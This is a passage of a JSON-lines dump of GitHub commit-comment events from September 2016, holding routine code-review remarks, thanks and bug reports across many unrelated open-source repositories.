{"id":"4513934692","type":"CommitCommentEvent","actor":{"login":"Geolem"},"repo":{"name":"elasticsearch-cn/elasticsearch-definitive-guide"},"payload":{"comment":{"id":18893415,"position":null,"line":null,"path":null,"commit_id":"b390183ad6dde6bc8524985ab6e7b98f3ca08ad4","created_at":"2016-09-04T15:40:21Z","updated_at":"2016-09-04T15:40:21Z","body":"LGTM"}},"created_at":"2016-09-04T15:40:21Z"}
{"id":"4513937542","type":"CommitCommentEvent","actor":{"login":"kampfschlaefer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893418,"position":null,"line":null,"path":null,"commit_id":"4745341c69772de5ddfee1f68e7421ad9d772b82","created_at":"2016-09-04T15:42:22Z","updated_at":"2016-09-04T15:42:22Z","body":"Hi, @vcunat \r\n\r\nThis breaks the nixos-containers. Or at least the tests for the containers (https://hydra.nixos.org/build/39887026).\r\n\r\nSadly I don't understand how this could make the containers wait for \"dev-vda.device\"…"}},"created_at":"2016-09-04T15:42:22Z"}
{"id":"4513937954","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18893420,"position":null,"line":null,"path":null,"commit_id":"e7e09aa1bdb026da5589b89ee5f7c0bd48963cb0","created_at":"2016-09-04T15:42:38Z","updated_at":"2016-09-04T15:42:38Z","body":"For this to work we need to have that module either merged upstream or in our **calamares-manjaro** repo and update the request to be merged upstream later ..."}},"created_at":"2016-09-04T15:42:38Z"}
{"id":"4513938122","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893421,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T15:42:44Z","updated_at":"2016-09-04T15:42:44Z","body":"Thanks for the tip!\n"}},"created_at":"2016-09-04T15:42:44Z"}
{"id":"4513940078","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18893422,"position":null,"line":null,"path":null,"commit_id":"15b41a573006c9635ca26a94d9bd062c1643ea49","created_at":"2016-09-04T15:44:05Z","updated_at":"2016-09-04T15:44:05Z","body":"Yes ! I'm glad you are trying this.\r\n\r\nI recommend a small rewrite which is more in line with evaluate.cpp coding style.\r\nconst Score BishopPawns[2] = {(8, 12); (8, x)};\r\n\r\nusing x = 0 might even work !\r\n\r\nand \r\n`score -= BishopPawns[pos.opposite_bishops()]\r\n             * ei.pi->pawns_on_same_color_squares(Us, s); `\r\n"}},"created_at":"2016-09-04T15:44:05Z"}
{"id":"4513940721","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":18893423,"position":null,"line":null,"path":null,"commit_id":"e7e09aa1bdb026da5589b89ee5f7c0bd48963cb0","created_at":"2016-09-04T15:44:31Z","updated_at":"2016-09-04T15:44:31Z","body":"Currently the default theme is called **spinfinity**."}},"created_at":"2016-09-04T15:44:31Z"}
{"id":"4513943117","type":"CommitCommentEvent","actor":{"login":"mo0ojava"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18893426,"position":null,"line":null,"path":null,"commit_id":"ad20150b941f37b24a5461638affadd855e8298f","created_at":"2016-09-04T15:46:16Z","updated_at":"2016-09-04T15:46:16Z","body":"Unfortunately this raises an exception. I'll patch it in a few."}},"created_at":"2016-09-04T15:46:16Z"}
{"id":"4513943533","type":"CommitCommentEvent","actor":{"login":"dothework"},"repo":{"name":"Shimunta/blocTime"},"payload":{"comment":{"id":18893427,"position":null,"line":null,"path":null,"commit_id":"7de35b1ce1447c438aac073c2214ec708d316949","created_at":"2016-09-04T15:46:35Z","updated_at":"2016-09-04T15:46:35Z","body":"@Shimunta Nice work here. 👏  You are shipping code 🚛  and getting better 🚀 ."}},"created_at":"2016-09-04T15:46:35Z"}
{"id":"4513946232","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893431,"position":null,"line":null,"path":null,"commit_id":"4745341c69772de5ddfee1f68e7421ad9d772b82","created_at":"2016-09-04T15:48:25Z","updated_at":"2016-09-04T15:48:25Z","body":"@kampfschlaefer: how did you then determine this commit breaks it?"}},"created_at":"2016-09-04T15:48:25Z"}
{"id":"4513946705","type":"CommitCommentEvent","actor":{"login":"NSbuilder"},"repo":{"name":"NSbuilder/login_system"},"payload":{"comment":{"id":18893432,"position":null,"line":null,"path":null,"commit_id":"e57c9e1613e8176a3b56537a663d593dae5a675e","created_at":"2016-09-04T15:48:46Z","updated_at":"2016-09-04T15:48:46Z","body":"*Added username and password length limits \r\n*ErrorHandler function had been changed.\r\n*Functions.h and Functions.cpp had been inlined and renamed to Helper.h\r\n*Error passing and checking will be done using enumeration.\r\n*console_clear and console_pause are now defined in struct.\r\n*Alternative for non-portable system(\"cls\") and system(\"pause\") functions when compiling on linux.\r\n"}},"created_at":"2016-09-04T15:48:46Z"}
{"id":"4513947118","type":"CommitCommentEvent","actor":{"login":"matachi"},"repo":{"name":"matachi/movie-diary"},"payload":{"comment":{"id":18893434,"position":null,"line":null,"path":null,"commit_id":"5d74917481d44e9e75c22faa30a636d5f40b762d","created_at":"2016-09-04T15:49:05Z","updated_at":"2016-09-04T15:49:05Z","body":"rating*"}},"created_at":"2016-09-04T15:49:05Z"}
{"id":"4513948958","type":"CommitCommentEvent","actor":{"login":"thitiboy"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":18893435,"position":null,"line":null,"path":null,"commit_id":"b7b833705f92dea125a29f3dcbd6403369f3fe65","created_at":"2016-09-04T15:50:26Z","updated_at":"2016-09-04T15:50:26Z","body":"สงสัยครับ if( ( $h2int >= 2138 && $h2int <= 2179) && ( $h2int >= 2327 && $h2int <= 2448) && ($net->getState() == Network::IN_GAME))\t\r\n\r\nทำไมใช้ && แบบนี้มันเข้าเงื่อนไขทั้งหมดหรอครับ"}},"created_at":"2016-09-04T15:50:26Z"}
{"id":"4513951306","type":"CommitCommentEvent","actor":{"login":"yegorf1"},"repo":{"name":"satan007/RogueBot"},"payload":{"comment":{"id":18893437,"position":null,"line":null,"path":null,"commit_id":"1d051ee4df022d01374825aeb18456ba57585095","created_at":"2016-09-04T15:52:02Z","updated_at":"2016-09-04T15:52:02Z","body":"Шикарная идея.)"}},"created_at":"2016-09-04T15:52:02Z"}
{"id":"4513952873","type":"CommitCommentEvent","actor":{"login":"emilsvennesson"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18893439,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-04T15:53:12Z","updated_at":"2016-09-04T15:53:12Z","body":"@aqw Ah, interchangeable is the word I should have searched for. :wink: Thanks again!"}},"created_at":"2016-09-04T15:53:12Z"}
{"id":"4513959674","type":"CommitCommentEvent","actor":{"login":"mikepenz"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18893441,"position":null,"line":null,"path":null,"commit_id":"dd5539c1dec69e3caedcd4e099c094e17da149f5","created_at":"2016-09-04T15:58:00Z","updated_at":"2016-09-04T15:58:00Z","body":"Thanks"}},"created_at":"2016-09-04T15:58:00Z"}
{"id":"4513960254","type":"CommitCommentEvent","actor":{"login":"matiasdelellis"},"repo":{"name":"pragha-music-player/pragha"},"payload":{"comment":{"id":18893442,"position":null,"line":null,"path":null,"commit_id":"9019ac28bc3c5e075cac171ebed9e8da047e4c43","created_at":"2016-09-04T15:58:23Z","updated_at":"2016-09-04T15:58:23Z","body":"p.s: In gtk 3.20\r\n\r\n`.header-bar {\r\n    -gtk-icon-style: symbolic;\r\n} `\r\n\r\n:wink: "}},"created_at":"2016-09-04T15:58:23Z"}
{"id":"4513960345","type":"CommitCommentEvent","actor":{"login":"RoboMWM"},"repo":{"name":"BigScary/PopulationDensity"},"payload":{"comment":{"id":18893443,"position":null,"line":null,"path":null,"commit_id":"0bd9c4cfd35bea73538604dc91a6cd099c02493a","created_at":"2016-09-04T15:58:26Z","updated_at":"2016-09-04T15:58:26Z","body":"> At first it was not but now my players can not do /spawn more because this plugin will override Essentials /spawn command.\r\n\r\nUse [commands.yml](http://wiki.bukkit.org/Commands.yml)\r\n\r\n> I was all by the time this plugin updated because I had a lot of horses and dogs all the time with tpen if you went to a region but from there were all these issues.\r\n\r\nMake sure they aren't near you\r\n\r\nRegardless, please continue to use the devbukkit/spigot forums for support, BigScary actually checks GitHub far less often than those two sites."}},"created_at":"2016-09-04T15:58:26Z"}
{"id":"4513960503","type":"CommitCommentEvent","actor":{"login":"DLvalentine"},"repo":{"name":"DLvalentine/GSX"},"payload":{"comment":{"id":18893444,"position":47,"line":49,"path":"GSX.pl","commit_id":"efe3eb096607da028454dcdb3d7c1ccc748d124b","created_at":"2016-09-04T15:58:33Z","updated_at":"2016-09-04T15:58:33Z","body":"This doesn't always print. Need to change that. Also need to change `Crawling ... ` to `Chapter x .... `"}},"created_at":"2016-09-04T15:58:33Z"}
{"id":"4513963902","type":"CommitCommentEvent","actor":{"login":"mandric"},"repo":{"name":"medic/medic-reporter"},"payload":{"comment":{"id":18893447,"position":2,"line":2,"path":"README.md","commit_id":"8913ff281db7b8f8b8b4b46b88ef6ae38d4fae46","created_at":"2016-09-04T16:00:44Z","updated_at":"2016-09-04T16:00:44Z","body":"The best place to look for docs/examples of these formats is probably the tests in medic-webapp . https://github.com/medic/medic-webapp/tree/master/tests/nodeunit/unit/kujua-sms  There are actually 3 formats, Muvuku, Textforms and Textforms Compact..."}},"created_at":"2016-09-04T16:00:44Z"}
{"id":"4513964307","type":"CommitCommentEvent","actor":{"login":"wilsonge"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18893449,"position":9,"line":115,"path":"libraries/legacy/view/category.php","commit_id":"f50eb418c04c9115983d9cd61483e2f8fe30b613","created_at":"2016-09-04T16:01:00Z","updated_at":"2016-09-04T16:01:00Z","body":"This breaks the category article view currently. It needs to be `$model->getState()` or `$this->get('State')`"}},"created_at":"2016-09-04T16:01:00Z"}
{"id":"4513965920","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18893451,"position":null,"line":null,"path":null,"commit_id":"977d2f1731ca6400adc63ad44664b2c6309e2b25","created_at":"2016-09-04T16:02:04Z","updated_at":"2016-09-04T16:02:04Z","body":"#25 Did"}},"created_at":"2016-09-04T16:02:04Z"}
{"id":"4513966155","type":"CommitCommentEvent","actor":{"login":"mandric"},"repo":{"name":"medic/medic-reporter"},"payload":{"comment":{"id":18893452,"position":10,"line":10,"path":"README.md","commit_id":"8913ff281db7b8f8b8b4b46b88ef6ae38d4fae46","created_at":"2016-09-04T16:02:13Z","updated_at":"2016-09-04T16:02:13Z","body":"Are these permanent assets?  Maybe commit them to the repo in a docs/ directory or something? Hopefully doesn't affect the ddoc build."}},"created_at":"2016-09-04T16:02:13Z"}
{"id":"4513966234","type":"CommitCommentEvent","actor":{"login":"AlexDenisov"},"repo":{"name":"AlexDenisov/mutang"},"payload":{"comment":{"id":18893453,"position":20,"line":36,"path":"include/Driver.h","commit_id":"358a0e62a10f251d597761ef17339bab29c489f4","created_at":"2016-09-04T16:02:16Z","updated_at":"2016-09-04T16:02:16Z","body":"`Sandbox()` here is not required"}},"created_at":"2016-09-04T16:02:16Z"}
{"id":"4513966469","type":"CommitCommentEvent","actor":{"login":"ronag"},"repo":{"name":"deepstreamIO/deepstream.io-client-js"},"payload":{"comment":{"id":18893454,"position":5,"line":110,"path":"src/record/json-path.js","commit_id":"06cc3273a3a7c9e90d5e3d2364adccf7527974f7","created_at":"2016-09-04T16:02:26Z","updated_at":"2016-09-04T16:02:26Z","body":"I don't quite like this, not do I like the `ALL_EVENT` route. The problem is that the paths are stores as keys and `undefined` is converted to a string inside `_callbacks` so a `path !== undefined` check is not good enough. However, currently `'undefined'` is not a valid path in a record."}},"created_at":"2016-09-04T16:02:26Z"}
{"id":"4513967737","type":"CommitCommentEvent","actor":{"login":"AlexDenisov"},"repo":{"name":"AlexDenisov/mutang"},"payload":{"comment":{"id":18893456,"position":19,"line":17,"path":"lib/Driver.cpp","commit_id":"358a0e62a10f251d597761ef17339bab29c489f4","created_at":"2016-09-04T16:03:22Z","updated_at":"2016-09-04T16:03:22Z","body":"It was grouped as is intentionally, could you put it back? :)"}},"created_at":"2016-09-04T16:03:22Z"}
{"id":"4513969770","type":"CommitCommentEvent","actor":{"login":"kampfschlaefer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18893459,"position":null,"line":null,"path":null,"commit_id":"4745341c69772de5ddfee1f68e7421ad9d772b82","created_at":"2016-09-04T16:04:52Z","updated_at":"2016-09-04T16:04:52Z","body":"@vcunat I did git bisect with the last good and the first bad commit in hydra. And can reproduce that here: with the commit before this `nix-build nixos/tests/containers-ipv4.nix` (one of the failing tests in -small) works, with this commit not anymore."}},"created_at":"2016-09-04T16:04:52Z"}
{"id":"4513972496","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893460,"position":25,"line":87,"path":"extmod/moduzlib.c","commit_id":"1bc5cb4312cae9702ab5fe5412b16156a08b8280","created_at":"2016-09-04T16:06:49Z","updated_at":"2016-09-04T16:06:49Z","body":"Sure, I don't keep everything in mind at the same time, and this code likely originated before it was added.\r\n"}},"created_at":"2016-09-04T16:06:49Z"}
{"id":"4513974929","type":"CommitCommentEvent","actor":{"login":"Nannoussa"},"repo":{"name":"Nannoussa/QOS_Predictor"},"payload":{"comment":{"id":18893466,"position":24,"line":32,"path":"Upload_data.py","commit_id":"f29ad41ef7629236e8c0a467e99d91ec1ca9dc2f","created_at":"2016-09-04T16:08:40Z","updated_at":"2016-09-04T16:08:40Z","body":"print the rows to extract"}},"created_at":"2016-09-04T16:08:40Z"}
{"id":"4513978496","type":"CommitCommentEvent","actor":{"login":"aashink"},"repo":{"name":"aashink/aashink.github.io"},"payload":{"comment":{"id":18893474,"position":5,"line":6,"path":"index.html","commit_id":"23338f1250c69ce516d1bc7630fc6b75c5f64faf","created_at":"2016-09-04T16:11:09Z","updated_at":"2016-09-04T16:11:09Z","body":"small"}},"created_at":"2016-09-04T16:11:09Z"}
{"id":"4513978841","type":"CommitCommentEvent","actor":{"login":"aashink"},"repo":{"name":"aashink/aashink.github.io"},"payload":{"comment":{"id":18893475,"position":13,"line":18,"path":"index.html","commit_id":"23338f1250c69ce516d1bc7630fc6b75c5f64faf","created_at":"2016-09-04T16:11:22Z","updated_at":"2016-09-04T16:11:22Z","body":"better\r\n"}},"created_at":"2016-09-04T16:11:22Z"}
{"id":"4513980962","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18893477,"position":null,"line":null,"path":null,"commit_id":"430c0084f77d0ab338818cb0332aadabed268176","created_at":"2016-09-04T16:12:56Z","updated_at":"2016-09-04T16:12:56Z","body":"This change is mandatory for firing grenades and cluster bombs properly."}},"created_at":"2016-09-04T16:12:56Z"}
{"id":"4513982023","type":"CommitCommentEvent","actor":{"login":"patrickdliang"},"repo":{"name":"patrickdliang/test"},"payload":{"comment":{"id":18893479,"position":null,"line":null,"path":null,"commit_id":"1da9c5616e567b80c01548950b02953050eae911","created_at":"2016-09-04T16:13:40Z","updated_at":"2016-09-04T16:13:40Z","body":"ttt"}},"created_at":"2016-09-04T16:13:40Z"}
{"id":"4513982785","type":"CommitCommentEvent","actor":{"login":"JustinGuedes"},"repo":{"name":"JustinGuedes/ramda.swift"},"payload":{"comment":{"id":18893480,"position":null,"line":null,"path":null,"commit_id":"1adca7f79407abd19906f85f46b774ad1f15c5a1","created_at":"2016-09-04T16:14:14Z","updated_at":"2016-09-04T16:14:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;e38xjgYe&#x2F;1-create-basic-project-structure-setup-with-pods-and-xcode-project\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create basic project structure, setup with Pods and Xcode project.</a>"}},"created_at":"2016-09-04T16:14:14Z"}
{"id":"4513984369","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18893481,"position":null,"line":null,"path":null,"commit_id":"465a9c3781c1a4f9a943ebde5c2834bc40934ce5","created_at":"2016-09-04T16:15:19Z","updated_at":"2016-09-04T16:15:19Z","body":"Last planned «feature» commit.\r\nNow only critical bugfixes will be submitted and some refactoring will be done.\r\nI may submit features «bonus pack» some months later."}},"created_at":"2016-09-04T16:15:19Z"}
{"id":"4513985201","type":"CommitCommentEvent","actor":{"login":"Timothy055"},"repo":{"name":"dsmiley/lucene-solr"},"payload":{"comment":{"id":18893482,"position":1,"line":1,"path":"lucene/highlighter/src/java/org/apache/lucene/search/uhighlight/AbstractFieldHighlighter.java","commit_id":"5f95e05595db462d3ab5bffc68c2c92f70875072","created_at":"2016-09-04T16:15:56Z","updated_at":"2016-09-04T16:15:56Z","body":"Nice to get rid of the abstract class!"}},"created_at":"2016-09-04T16:15:56Z"}
{"id":"4513986214","type":"CommitCommentEvent","actor":{"login":"rubenwardy"},"repo":{"name":"cdqwertz/rpgtest"},"payload":{"comment":{"id":18893483,"position":34,"line":267,"path":"mods/quests/init.lua","commit_id":"219817235e1a6bfc6ebe992bea0feae94166caaa","created_at":"2016-09-04T16:16:41Z","updated_at":"2016-09-04T16:16:41Z","body":"probably would have been better to extend process_node_count_goals to take an optional integer that defaults to 1, to remove the need for this for loop - instead you'd just pass in the count"}},"created_at":"2016-09-04T16:16:41Z"}
{"id":"4513988067","type":"CommitCommentEvent","actor":{"login":"Fossil01"},"repo":{"name":"Sonarr/Sonarr"},"payload":{"comment":{"id":18893484,"position":null,"line":null,"path":null,"commit_id":"6e8480d7cb47c05d8eee23e8031b555fc13c1dc3","created_at":"2016-09-04T16:18:00Z","updated_at":"2016-09-04T16:18:00Z","body":"Cheers!"}},"created_at":"2016-09-04T16:18:00Z"}
{"id":"4513992038","type":"CommitCommentEvent","actor":{"login":"blookvoodow"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18893487,"position":null,"line":null,"path":null,"commit_id":"c74bdd326c11d30aec1e0f716a079cbfd9e2eb75","created_at":"2016-09-04T16:20:45Z","updated_at":"2016-09-04T16:20:45Z","body":"Nice work, missed a slash here \"+C:\\NexonLibrary\\mabinogi\\appdata\""}},"created_at":"2016-09-04T16:20:45Z"}
{"id":"4513992100","type":"CommitCommentEvent","actor":{"login":"Timothy055"},"repo":{"name":"dsmiley/lucene-solr"},"payload":{"comment":{"id":18893488,"position":4,"line":44,"path":"lucene/highlighter/src/java/org/apache/lucene/search/uhighlight/AnalysisFieldHighlighter.java","commit_id":"5f95e05595db462d3ab5bffc68c2c92f70875072","created_at":"2016-09-04T16:20:48Z","updated_at":"2016-09-04T16:20:48Z","body":"I'm slightly unsure about the name FieldOffsetStrategy as a name, but it's arguably more accurate the FieldOffsetSource since we already use combinations.  Maybe we should rename all the FieldHighlighters to some variant of FieldOffsetStrategy?  This might also set up for splitting up Analysis if we wanted as well?"}},"created_at":"2016-09-04T16:20:48Z"}
{"id":"4513995280","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18893490,"position":205,"line":3412,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T16:23:03Z","updated_at":"2016-09-04T16:23:03Z","body":"Todo:\r\nMuß noch nach Englisch übersetzt werden"}},"created_at":"2016-09-04T16:23:03Z"}
{"id":"4513995645","type":"CommitCommentEvent","actor":{"login":"dericed"},"repo":{"name":"amiaopensource/vrecord"},"payload":{"comment":{"id":18893495,"position":null,"line":null,"path":null,"commit_id":"dedee723f3f36bc98a8c75caab1a6142fe272fb5","created_at":"2016-09-04T16:23:17Z","updated_at":"2016-09-04T16:23:17Z","body":"I agree with @kieranjol. This is great to see in action, but the form of transfer metadata should be standardized through a discussion on the cellar listserv. CC: @t-rapp"}},"created_at":"2016-09-04T16:23:17Z"}
{"id":"4513996090","type":"CommitCommentEvent","actor":{"login":"icsvortex666"},"repo":{"name":"icsvortex666/The-Cup-Game"},"payload":{"comment":{"id":18893498,"position":null,"line":null,"path":null,"commit_id":"7dbfcaa3d33b5ed9c519896feb90d48d9f871669","created_at":"2016-09-04T16:23:38Z","updated_at":"2016-09-04T16:23:38Z","body":"Thank you Andrew, i'll keep that it in mind!"}},"created_at":"2016-09-04T16:23:38Z"}
{"id":"4513998820","type":"CommitCommentEvent","actor":{"login":"dechuck"},"repo":{"name":"unsplash/unsplash-php"},"payload":{"comment":{"id":18893503,"position":null,"line":null,"path":null,"commit_id":"3288f6b151297c0232d71c6c4dfa712c298b3831","created_at":"2016-09-04T16:25:31Z","updated_at":"2016-09-04T16:25:31Z","body":"Totally.. I'm pushing a new version to fix that."}},"created_at":"2016-09-04T16:25:31Z"}
{"id":"4513999181","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18893504,"position":53,"line":1474,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T16:25:48Z","updated_at":"2016-09-04T16:25:48Z","body":"Das Disable receiver hat bei mir erst funktioniert nach dem ich eine Verzögerung von 1.5 Sekunden eingebaut habe."}},"created_at":"2016-09-04T16:25:48Z"}
{"id":"4514001823","type":"CommitCommentEvent","actor":{"login":"stevendiaz"},"repo":{"name":"cs371p-fall-2016/collatz-tests"},"payload":{"comment":{"id":18893508,"position":100,"line":100,"path":"ek6798-TestCollatz.c++","commit_id":"d61a5ae985c9948c84518cba4f15055ba7d6260e","created_at":"2016-09-04T16:27:40Z","updated_at":"2016-09-04T16:27:40Z","body":"Wouldn't this hit numbers that overflow an int and thus be an invalid test?\r\n"}},"created_at":"2016-09-04T16:27:40Z"}
{"id":"4514003464","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"MariaFlorenciaGonzalez/empleartec-java"},"payload":{"comment":{"id":18893513,"position":null,"line":null,"path":null,"commit_id":"9e15585b081aee4841cddf16ce4e2543cff84a5e","created_at":"2016-09-04T16:28:56Z","updated_at":"2016-09-04T16:28:56Z","body":"Excelente Flor!!!"}},"created_at":"2016-09-04T16:28:56Z"}
{"id":"4514003915","type":"CommitCommentEvent","actor":{"login":"stevendiaz"},"repo":{"name":"cs371p-fall-2016/collatz-tests"},"payload":{"comment":{"id":18893515,"position":73,"line":73,"path":"as67659-TestCollatz.c++","commit_id":"b98aea8aa0e77e89421d49741286be61cac26cd0","created_at":"2016-09-04T16:29:13Z","updated_at":"2016-09-04T16:29:13Z","body":"similar question in a previous commit: UVA wouldn't test this because it contains numbers that will overflow an int. Unless I'm missing something here?"}},"created_at":"2016-09-04T16:29:13Z"}
{"id":"4514006344","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":18893520,"position":null,"line":null,"path":null,"commit_id":"46adb22e814071c3e908ff047b3fb7d99af68b9a","created_at":"2016-09-04T16:30:55Z","updated_at":"2016-09-04T16:30:55Z","body":"true, as the cast is so much cut off , but still im hoping we will handle it somehow (i know there is issue about that ;-) )"}},"created_at":"2016-09-04T16:30:55Z"}
{"id":"4514006879","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/practice_challenges"},"payload":{"comment":{"id":18893522,"position":38,"line":37,"path":"challenge_5/spec/book_spec.rb","commit_id":"03c16a5c408ce0a56d00ecf3b95950108752ce33","created_at":"2016-09-04T16:31:16Z","updated_at":"2016-09-04T16:31:16Z","body":"You need to test the sad path as well as the happy path. "}},"created_at":"2016-09-04T16:31:16Z"}
{"id":"4514006917","type":"CommitCommentEvent","actor":{"login":"zuo"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18893523,"position":15,"line":346,"path":"NEWS.md","commit_id":"fc3cbc9e15c73c937afbee35e08b8809ef282f58","created_at":"2016-09-04T16:31:18Z","updated_at":"2016-09-04T16:31:18Z","body":"The issue #16622 seems to be unrelated to `map` + dictionaries. Shouldn't another issue be referenced here?"}},"created_at":"2016-09-04T16:31:18Z"}
{"id":"4514007066","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18893524,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T16:31:24Z","updated_at":"2016-09-04T16:31:24Z","body":"I'm running this and it either has found the perfect match or has got stuck in a local minimum...\r\n![screenshot from 2016-09-04 18 29 14](https://cloud.githubusercontent.com/assets/500/18232320/b3e9f3fa-72cd-11e6-869b-1b933a780574.png)\r\nDoes the default algorithm usually yield good results?\r\n"}},"created_at":"2016-09-04T16:31:24Z"}
{"id":"4514007956","type":"CommitCommentEvent","actor":{"login":"Breech99"},"repo":{"name":"Vdauphin/HeartsAndMinds"},"payload":{"comment":{"id":18893526,"position":null,"line":null,"path":null,"commit_id":"99f4f928336198729d207c3414545404508152e7","created_at":"2016-09-04T16:32:06Z","updated_at":"2016-09-04T16:32:06Z","body":"On the paramaters you set from 70% to 0.  -\t\tdefault = 70;\r\n+\t\tdefault = 0;  \r\n\r\nDoes the percentage get handled from another file or did you leave it at 0 for testing? when I set to 70% it says in parameters 100%. "}},"created_at":"2016-09-04T16:32:06Z"}
{"id":"4514009854","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/practice_challenges"},"payload":{"comment":{"id":18893527,"position":28,"line":17,"path":"challenge_5/book.rb","commit_id":"03c16a5c408ce0a56d00ecf3b95950108752ce33","created_at":"2016-09-04T16:33:32Z","updated_at":"2016-09-04T16:33:32Z","body":"Why mixing self and instance variables?"}},"created_at":"2016-09-04T16:33:32Z"}
{"id":"4514010197","type":"CommitCommentEvent","actor":{"login":"ashleyle1402"},"repo":{"name":"GWStudentAssociation/SA-Website"},"payload":{"comment":{"id":18893530,"position":null,"line":null,"path":null,"commit_id":"70739cf8e59167540f6ba2503e53f2f1ce030a6d","created_at":"2016-09-04T16:33:49Z","updated_at":"2016-09-04T16:33:49Z","body":"Updated active judges."}},"created_at":"2016-09-04T16:33:49Z"}
{"id":"4514010270","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"sanmato/empleartec-java"},"payload":{"comment":{"id":18893531,"position":11,"line":11,"path":"src/Labotatorio2daClaseEj1/src/demo/Producto.java","commit_id":"a554fa255e71837c132a6681b2802a3a3e41a223","created_at":"2016-09-04T16:33:53Z","updated_at":"2016-09-04T16:33:53Z","body":"Muy bien el javadoc!!"}},"created_at":"2016-09-04T16:33:53Z"}
{"id":"4514011832","type":"CommitCommentEvent","actor":{"login":"requiemformemories"},"repo":{"name":"NTUOSC/ntuosc.github.io"},"payload":{"comment":{"id":18893534,"position":null,"line":null,"path":null,"commit_id":"90948b80836e32049d5db2e3d56c43d656b02157","created_at":"2016-09-04T16:35:00Z","updated_at":"2016-09-04T16:35:00Z","body":"LGTM"}},"created_at":"2016-09-04T16:35:00Z"}
{"id":"4514013795","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"zqlprovider/empleartec-java"},"payload":{"comment":{"id":18893538,"position":null,"line":null,"path":null,"commit_id":"43a63be244515bcb5977997a2e8e4ad7eb7d2c48","created_at":"2016-09-04T16:36:26Z","updated_at":"2016-09-04T16:36:26Z","body":"Excelente!!!"}},"created_at":"2016-09-04T16:36:26Z"}
{"id":"4514014108","type":"CommitCommentEvent","actor":{"login":"ashleyle1402"},"repo":{"name":"GWStudentAssociation/SA-Website"},"payload":{"comment":{"id":18893540,"position":null,"line":null,"path":null,"commit_id":"49018cde9871978447f4dc536daceb120ffa56aa","created_at":"2016-09-04T16:36:41Z","updated_at":"2016-09-04T16:36:41Z","body":"Added on position SPHHS-G"}},"created_at":"2016-09-04T16:36:41Z"}
{"id":"4514014607","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18893541,"position":null,"line":null,"path":null,"commit_id":"056f7d9d3f55d89def05e7f07170a2366757886c","created_at":"2016-09-04T16:37:04Z","updated_at":"2016-09-04T16:37:04Z","body":"mit draufklichen klappt!\r\nnur wird noch nicht des richtige event angezeigt also ich hab an einem teilgenommen das in einer stunde anfängt und an eins was in paar tagen stattfindet und es wird das zweite angezeigt"}},"created_at":"2016-09-04T16:37:04Z"}
{"id":"4514015169","type":"CommitCommentEvent","actor":{"login":"AdamWill"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18893542,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-04T16:37:28Z","updated_at":"2016-09-04T16:37:28Z","body":"I've got some concerns about this commit. Last night I updated our staging instance's workers from cd35b40b9 (with 7d23e1d50 and 1962d68e applied as patches) to current master (0b5d885b). Since then I've had four workers die mysteriously (which wasn't happening before) and several tests where the worker appears to be for some reason typing the wrong thing, e.g. https://openqa.stg.fedoraproject.org/tests/37495 . We do have occasional keyboard errors in our tests, but I don't ever recall seeing ones like this before - at a console (not in X) and not just dropping characters but actually messing them up.\r\n\r\nI can't quite see 